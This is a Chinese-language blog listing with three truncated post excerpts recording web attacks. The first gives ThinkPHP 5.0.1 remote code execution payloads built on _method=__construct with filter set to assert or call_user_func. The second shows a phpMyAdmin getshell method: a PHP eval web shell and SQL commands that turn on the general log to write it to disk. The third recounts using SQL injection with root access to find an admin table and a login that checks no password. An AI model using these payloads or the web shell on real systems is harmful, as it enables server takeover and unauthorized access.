thinkphp 5.0.1的坑
2021年04月18日 No comment判断是否存在http://xxx.com/publics=phpinfo()&_method=__construct&filter=assert
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&
阅读全文 »
phpmyadmin getshell 记录
2019年09月08日 No comment phpmyadmin getshellselect '<?php @eval($_POST[admin])?>';
show global variables like '%general%';
set global general_log = on;
set global gen
阅读全文 »
记一次曲折的获取网站路径
2019年07月28日 No comment 网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找 最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。 &nb
阅读全文 »